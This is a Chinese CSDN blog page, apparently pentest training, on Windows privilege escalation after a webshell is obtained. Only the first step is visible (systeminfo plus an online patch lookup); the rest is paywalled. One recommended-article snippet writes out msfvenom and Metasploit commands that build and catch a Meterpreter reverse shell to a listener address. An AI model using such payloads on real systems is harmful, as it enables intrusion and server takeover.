Windows常见的几种提权方法

最新推荐文章于 2024-07-09 18:04:08 发布
最新推荐文章于 2024-07-09 18:04:08 发布
阅读量1w 收藏
点赞数 6
文章标签: web安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/124882702
版权
本文介绍了Windows渗透测试中常用的提权方法,包括补丁查询法、CVE-2016-3225、CVE-2014-4113、CVE-2020-0787提权,本地DLL劫持和MySQL UDF提权。通过这些方法,攻击者可以提升权限,控制目标服务器。
摘要由CSDN通过智能技术生成 
零基础学黑客,搜索公众号:白帽子左一

作者:掌控安全—杰斯

提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限

在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。

这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。

1.补丁查询法

简介
补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的性能,而去使用一种安全措施。

当拿到目标应用的webshell之后,可以通过补丁查询的方法,来查看目标系统是否有未打补丁从而造成的某些安全隐患,从而可以被我们利用。

复现
第一步:执行命令 systeminfo ,将执行结果复制。

图片

第二步:粘贴到补丁查询的网页上进行查询。

图片

ps:http://bugs.hacking8.co

最低0.47元/天 解锁文章
zkzq
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Windows提权几种常用姿势
01-11 4万+
当获取主机权限时,我们总是希望可以将普通用户提升为管理员用户,以便获得高权限完全控制目标主机。Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、B...
HW之红队常见Linux的几种提权方法
hackzkaq的博客
05-30 1158
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 前言 HW即将开始,不管是 Windows 提权还是 Linux 提权方法都非常之多,实际情况下,还是需要根据对应的情况选择对应的提权方法,今天就Linux常见几种提权方式做个整理. 想要复习windows提权上期分享过,点击查看图片:HW之红队常见Windows几种提权方法、 HW之红队常见Windows几种权限维持 Linux常见几种提权方法 提权,提高自己在服务器中的权限,主要针对网站入侵过程中,当渗透某一网站时,通过各种漏洞
Windows提权方法简单总结_systminfo ,根据系统补丁提权
2401_84296945的博客
04-26 713
写了好多天的windows与linux提权技巧,现在做下简单的总结。提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
Kotlin 实现动态获权的两种方式?
yyxhzdm的博客
09-21 865
一、自定义 1.在项目的BaseActivity添加代码 /** * 动态获权 * */ /** * 动态获权请求值 */ private var REQUEST_CODE_PERMISSION = 0x00099 protected val TAG = this.javaClass.simpleName /** * 请求权限 * 动态获权 * @param permissions 请求的权限 * @param requestCode 请求权限的请求码 */ open fun re
最全windows提权总结(建议收藏)
最新发布
小司机的奥拓
07-09 1109
提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等。
Windows系统常见提权方式
m0_64481831的博客
03-26 1481
提权依然要查看一些条件,最简单的办法就是直接尝试提权,能成功就成功,因为现实的环境都是很复杂的。
windows 提权
qq_63527808的博客
11-22 1253
一、提权的常用方法
windows系统权限提升
weixin_53639243的博客
04-23 2511
提权方法
Windows,Linux等系统提权工具
01-20
本文将详细介绍几种常见的用于Windows和Linux系统的提权工具及其使用方法。 ### 知识点二:Linux提权工具——Linux_Exploit_Suggester #### 工具介绍 Linux_Exploit_Suggester是一款用于Linux系统提权的工具,它...
lpk.rar_delphi 提权_提权
09-21
在深入理解这个提权技术时,我们需要关注以下几个关键知识点: 1. **Delphi编程**:Delphi的语法特性,如何编写DLL(动态链接库),以及如何利用Delphi的事件驱动模型进行系统调用。 2. **DLL注入**:将"lpk.dll...
Windows提权
qq_59102311的博客
05-08 1697
windows权限认识(用户及用户组):Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。
Windows提权方法简单总结
越努力 越自由
03-23 9922
提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。 在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
常见Windows提权方法
weixin_48968378的博客
12-14 3827
目录 1、无引号提权路径(Trusted Service Paths) 2、易受到攻击的服务(Vulnerable Services) 3、AlwaysInstallElevated(始终安装高架) 4、信息泄露 5、基于资源的域约束性委派利用 6、POTATO家族 7、MySQL下的提权技术 MOF提权 UDF提权 启动项提权 8、命令管道提权 9、令牌窃取 10、常见Windows提权CVE 1、无引号提权路径(Trusted Service Paths) 原理:利用.
windows提权几种姿势
weixin_44300286的博客
09-07 4311
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
Window怎么提权
weixin_42581003的博客
12-27 278
提权是指在操作系统中获取更高权限的过程。在 Windows 系统中,通常有两种方法可以提权: 使用管理员账户登录系统。在 Windows 系统中,管理员账户具有最高权限,可以执行任何操作。如果你的账户是管理员账户,则可以直接使用该账户登录系统。 使用 "管理员" 身份运行某个程序。如果你的账户不是管理员账户,但你希望运行某个程序时具有管理员权限,则可以使用 "管理员" 身份运行该程序。要这样做...
Windows提权方法大全汇总(值的收藏)
MachineGunJoe666
08-24 4899
一、无引号服务路径 ( Trusted Service Paths ) 先说实用度,比较被动,而且比较看脸。 Windows下服务的权限通常是SYSTEM。如果我们能够替换服务的启动程序为我们的恶意程序(如反弹shell),即相当于获得了SYSTEM权限,达到了提权的目的。 无引号服务路径有可能会导致这种情况的发生。 所谓无引号服务路径,就是服务启动程序的路径中包含了空格且未被引号包含起来。比如这样 C:\Program Files\floder1\service.exe 因为空格的存在,Windows.
系统提权——Windows系统提权
JulySec的博客
02-13 2090
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
windows系统提权方法
05-31
下面列举几种常见Windows系统提权攻击方法: 1. 利用系统漏洞:攻击者可以利用Windows系统中的漏洞来提升自己的权限。比如,利用Windows系统中的SMB漏洞、WebDAV漏洞等,通过网络攻击获得系统权限。 2. 利用应用...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值